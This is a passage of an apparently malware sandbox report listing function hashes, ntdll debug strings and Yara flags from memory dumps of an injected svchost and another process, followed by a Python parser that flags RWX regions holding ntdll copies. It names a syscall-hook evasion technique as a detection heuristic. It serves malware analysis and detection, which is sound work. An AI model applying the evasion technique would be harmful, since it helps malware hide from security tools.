                                                                                            • API String ID: 1302938615-699404926
                                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                            • Instruction ID: 692d9c299c65e652c387dedeb3a643475e05cd2aeb33f94cf9d3aef3ba7e780e
                                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                            • Instruction Fuzzy Hash: 96816BB4E062499EDF24CF68CCD17EEBBB6AF46250F1C425FD861AB391C63499408B70
                                                                                            Strings
                                                                                            • RTL: Re-Waiting, xrefs: 03AA031E
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03AA02E7
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03AA02BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                            • API String ID: 0-2474120054
                                                                                            • Opcode ID: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                                                                            • Instruction ID: a829cdd8fd70b01a40f07c48e17ebcbf59ac56834db0bff96b6692793dc9fac0
                                                                                            • Opcode Fuzzy Hash: 8171a73a522a2e2ae02657b52d39fa63da7ae1955ecb5dc9dfb5641cec53ac31
                                                                                            • Instruction Fuzzy Hash: 57E1CC31608B41DFD724CF28C984B2AB7E4BF89314F180A6EF9A58B6E1D774D944CB52
                                                                                            Strings
                                                                                            • RTL: Resource at %p, xrefs: 03AA7B8E
                                                                                            • RTL: Re-Waiting, xrefs: 03AA7BAC
                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03AA7B7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 0-871070163
                                                                                            • Opcode ID: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                                                                            • Instruction ID: 9c081307b8ba9ad594f599379f55e6de82f50171cc0e9ed5beb7c738b348f49c
                                                                                            • Opcode Fuzzy Hash: 61908beaef8b2c082e8c6ead0c6af44ea67c14cd38f2fc56d018a4c2fc5bec77
                                                                                            • Instruction Fuzzy Hash: D541B2367007029FC724DF69CD40B6AB7E9EB89710F140A2EE956DB690DB71E4058BA1
                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03AA728C
                                                                                            Strings
                                                                                            • RTL: Resource at %p, xrefs: 03AA72A3
                                                                                            • RTL: Re-Waiting, xrefs: 03AA72C1
                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03AA7294
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 885266447-605551621
                                                                                            • Opcode ID: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                                                                            • Instruction ID: 0a863f17a1bc196f58818d7adb1a92f36501d85c610dbd7bd0b90e1c26c2093c
                                                                                            • Opcode Fuzzy Hash: dd123cc5c18aee18e19779f90ea561fd81ed4fff567570b827424dcb1576b59f
                                                                                            • Instruction Fuzzy Hash: 2B41E136600706AFC724DF69CC41B6AB7A9FB94710F140A2FF855DB240DB31E81687E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                            • Instruction ID: eac62f73c55acd8fb255fd76053b445bae2821f540de45e3cc07a6c78ae7ed7e
                                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                            • Instruction Fuzzy Hash: 3E91A071E002169EDB24DF69CDC1ABEB7B9AF44320F58462FE865E72C0D7368942CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$@
                                                                                            • API String ID: 0-1194432280
                                                                                            • Opcode ID: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                                                                            • Instruction ID: 2827f768d20e42e7bebd5ce388238204eb0253c011ccd7e41c5e8bbc1d3255ab
                                                                                            • Opcode Fuzzy Hash: 63a5f381fc25654856b3000758802225db1f937adccef64e4812b2e7955b3615
                                                                                            • Instruction Fuzzy Hash: 55813A76D002699BDB31DF54CD44BEAB7B8AB48710F0445EBA90DB7680E7709E84CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: oP{$6$O$S$\$s
                                                                                            • API String ID: 0-3955500580
                                                                                            • Opcode ID: d9a78b43525a589567d5b13a42a97470f5c31c1f51be0335d121dd6a42c6c8cb
                                                                                            • Instruction ID: e0f4b41538174f62344ffb52e76561b5980709fbbd880882943d1557c2a69e63
                                                                                            • Opcode Fuzzy Hash: d9a78b43525a589567d5b13a42a97470f5c31c1f51be0335d121dd6a42c6c8cb
                                                                                            • Instruction Fuzzy Hash: AF5160B2D01219ABEB11EFD4DD89EEEB7B8FF84714F0042D9E90956140E7B46B44CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: =U
                                                                                            • API String ID: 0-808517434
                                                                                            • Opcode ID: 14fae923396668484efb98fa720fab751cf0903af89031984c1531604a9cb175
                                                                                            • Instruction ID: ea4defb039b39fbb85b096fdcaa3b702b1afe013a65bd6ddd20a53311e57cb09
                                                                                            • Opcode Fuzzy Hash: 14fae923396668484efb98fa720fab751cf0903af89031984c1531604a9cb175
                                                                                            • Instruction Fuzzy Hash: 0211D3B6D01219AF9B00DFE9D9449EEBBF9FF88210F04456AE915E7200E7705A04CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a556ac8f478930ff6b9bc5ed30819794509626dc575b0c5c6f7b98c8d1557467
                                                                                            • Instruction ID: 833d7ee2447dbbee0554deaa0ef3c1564e3f469f64835f4dba526eed5a7cbeab
                                                                                            • Opcode Fuzzy Hash: a556ac8f478930ff6b9bc5ed30819794509626dc575b0c5c6f7b98c8d1557467
                                                                                            • Instruction Fuzzy Hash: 9F3204B1D05269CFEB24DF48C894BDDBBB2BB84308F1085D9D14AAB690C7B55A85CF81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0be7e711008555287c67e3fafc2d4db2926cb144c5c2ceefd3309fa08063a7e5
                                                                                            • Instruction ID: 16c62b5615ef4f89d5fe5b7002c8683945af02fe644f3545cd6730f68b7017a1
                                                                                            • Opcode Fuzzy Hash: 0be7e711008555287c67e3fafc2d4db2926cb144c5c2ceefd3309fa08063a7e5
                                                                                            • Instruction Fuzzy Hash: 8B1186723802057BF7209A559C47FBB375DEBC5B21F244099FB18AA2C0E6E5F81147B4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 51a20866abfe1b14a0e02127222a3ada9b0eb690db3f39ecc09d3c234a670ed7
                                                                                            • Instruction ID: 8d1886d75872d6133e2cb5106f64ee6842207bd139c4055f0a8de8e6cff1a888
                                                                                            • Opcode Fuzzy Hash: 51a20866abfe1b14a0e02127222a3ada9b0eb690db3f39ecc09d3c234a670ed7
                                                                                            • Instruction Fuzzy Hash: E921E2B6D01219AF9F00DFE9D8458EEBBF9FF88210F14456AE919E7200E7705A058BA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c2e51d759aff8d8ca54e006172727db2458450f5a244f2dff1b1918d7fa890e4
                                                                                            • Instruction ID: 597f9663b820ef3dde5098fb4a7e1592dd00bb4f042d9dc481ac0eb4b43d3f8e
                                                                                            • Opcode Fuzzy Hash: c2e51d759aff8d8ca54e006172727db2458450f5a244f2dff1b1918d7fa890e4
                                                                                            • Instruction Fuzzy Hash: D1115171600655AFDB20EBA8CC46FBF7BACFB89710F10454DF96897281E7B065058BA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 43365265a4e1a620b3fc60aa1e06ac738e347ed5450358c9ef8a53bcd6a49940
                                                                                            • Instruction ID: 6abe60b9edad87eeac14edcbfcc5472fe65966974e69eaaa11ac3522d88bfdbe
                                                                                            • Opcode Fuzzy Hash: 43365265a4e1a620b3fc60aa1e06ac738e347ed5450358c9ef8a53bcd6a49940
                                                                                            • Instruction Fuzzy Hash: D00180B2204609BBCB44DE99DC81EDB77ADAF8D754F418209BA19E7240D670E8918BA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1bc5afc42ddbb92141c2c791200da9a9ebea353ee6f590b2fa6391a5d19b11b
                                                                                            • Instruction ID: 6044df8ed07758679e0bd0d04071d9bf42294855680c10fb9550c2f0114983da
                                                                                            • Opcode Fuzzy Hash: e1bc5afc42ddbb92141c2c791200da9a9ebea353ee6f590b2fa6391a5d19b11b
                                                                                            • Instruction Fuzzy Hash: F701E9B2D01219AF8B40DFE8D8449EEBBF8BB58200F14466AE519F3200F7B15604CBE0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7d27ab89eeec58d02c5abb1da15ce926c5ec2d36fb9a5dd760dc7af64820874
                                                                                            • Instruction ID: 65288cb4cd7db4b476dac094ed5ea7e6ee4265f2c341de77f0168eb0dd82a48a
                                                                                            • Opcode Fuzzy Hash: d7d27ab89eeec58d02c5abb1da15ce926c5ec2d36fb9a5dd760dc7af64820874
                                                                                            • Instruction Fuzzy Hash: F5F0827180520DEBDB14CFA4D841BDEBBB4FB04320F1083ADE8259B280D67497508781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 35af77d883470ba60f9356892d958fd741f5bc8cd55b1907fa4f9f8c6b65b2ac
                                                                                            • Instruction ID: ec09ddf2a6900218d39cf1473dbd7ca694fdd0898f438be87fecea2aeede58b5
                                                                                            • Opcode Fuzzy Hash: 35af77d883470ba60f9356892d958fd741f5bc8cd55b1907fa4f9f8c6b65b2ac
                                                                                            • Instruction Fuzzy Hash: 40E08632240605BBD620EB59CC01F9B776CEFC9710F004419FA08AB241DA71791587B0
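The function records above can be processed mechanically rather than read one by one. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses records in the layout shown (APIs, Strings, Memory Dump Source, Snapshot File, Similarity fields), decodes the dump file name and groups the functions per memory dump. Assumptions, marked in the code: the field order inside the .sdmp file name and the hcaresult_… snapshot naming are inferred from the names on this page, the Protect and Type fields are decoded with the standard Win32 constants, and the two-record input is a constructed, truncated excerpt of the listing. The "RTL: …" and "CLIENT(ntdll): …" strings are ntdll.dll's own debug strings, so a writable and executable private region in the svchost process (0x03A00000, based on PE: true) that carries them is read here as a copy of ntdll living outside the normally loaded image, which is the usual substrate for the direct/indirect syscall behaviour the report flags.

```python
import re

# Constructed two-record excerpt of the listing above (Source File and
# Snapshot File values verbatim, hash values truncated).
SAMPLE = """\
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03AA728C
Strings
• RTL: Resource at %p, xrefs: 03AA72A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03AA7294
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Resource at %p
• Opcode ID: dd123cc5c18aee18
• Instruction Fuzzy Hash: 2B41E136600706AF
Memory Dump Source
• Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
Yara matches
Similarity
• API ID:
• String ID: =U
• Opcode ID: 14fae92339666848
• Instruction Fuzzy Hash: 0211D3B6D01219AF
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Win32 MEMORY_BASIC_INFORMATION Protect / Type values.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
# Prefixes of ntdll.dll's own debug strings (RTL wait diagnostics, loader IFEO handling).
NTDLL_PREFIXES = ("RTL: ", "CLIENT(ntdll): ")
SOURCE_RE = re.compile(r"^(?P<file>\S+)\.sdmp, Offset: [0-9A-Fa-f]+, based on PE: (?P<pe>true|false)$")
# Assumed snapshot naming (from the names on this page): hcaresult_<proc>_<run>_<base>_<image name>.jbxd
SNAP_RE = re.compile(r"^hcaresult_\d+_\d+_[0-9a-f]+_(?P<proc>.+)\.jbxd$")

new_record = lambda: {"apis": [], "strings": [], "fields": {}, "yara": False}


def parse_records(text):
    """One dict per disassembled function; a record ends at its Instruction Fuzzy Hash line."""
    records, cur, section = [], new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif line == "Yara matches":
            cur["yara"] = True
        elif line.startswith("• "):
            body = line[2:]
            if section == "APIs":
                cur["apis"].append(body)
            elif section == "Strings":
                s, _, xref = body.rpartition(", xrefs: ")
                cur["strings"].append((s, xref))
            else:
                key, _, value = body.partition(":")
                cur["fields"][key] = value.strip()
                if key == "Instruction Fuzzy Hash":
                    records.append(cur)
                    cur = new_record()
    return records


def decode_source(value):
    """Decode a 'Source File' value.  Field order in the .sdmp name is an assumption
    taken from the names on this page: <proc>.<run>.<id>.<base>.<protect>.<?>.<type>.<?>"""
    m = SOURCE_RE.match(value)
    if not m:
        raise ValueError(f"unrecognised Source File: {value!r}")
    p = m.group("file").split(".")
    protect, mtype = int(p[4], 16), int(p[6], 16)
    return {"process_index": int(p[0], 16), "base": int(p[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "type": MEM_TYPE.get(mtype, hex(mtype)), "pe_header": m.group("pe") == "true"}


def summarize(records):
    """Group functions by (process index, dump base) and collect the per-dump facts."""
    dumps = {}
    for rec in records:
        src = decode_source(rec["fields"]["Source File"])
        snap = SNAP_RE.match(rec["fields"].get("Snapshot File", ""))
        d = dumps.setdefault((src["process_index"], src["base"]), {**src,
            "process": snap.group("proc") if snap else None,
            "functions": 0, "yara": False, "ntdll_strings": set()})
        d["functions"] += 1
        d["yara"] |= rec["yara"]
        d["ntdll_strings"].update(s for s, _ in rec["strings"] if s.startswith(NTDLL_PREFIXES))
    return dumps


def ntdll_copies(dumps):
    """RWX, non-image dumps that carry ntdll's own strings: an ntdll copy outside the
    loader's view, the usual substrate for direct/indirect syscalls past user-mode hooks."""
    return sorted(k for k, d in dumps.items() if d["protect"] == "PAGE_EXECUTE_READWRITE"
                  and d["type"] != "MEM_IMAGE" and d["ntdll_strings"])


if __name__ == "__main__":
    dumps = summarize(parse_records(SAMPLE))
    for (proc, base), d in dumps.items():
        print(f"proc {proc} base {base:#x} {d['process']} {d['protect']} {d['type']} "
              f"PE={d['pe_header']} funcs={d['functions']} yara={d['yara']}")
    print("ntdll copies:", [f"{b:#x}" for _, b in ntdll_copies(dumps)])
```

Run it over a saved copy of this report section to get one line per dump; the Opcode ID and Instruction Fuzzy Hash fields kept in each record can then be used to de-duplicate functions across dumps or to match them against the reports of other samples.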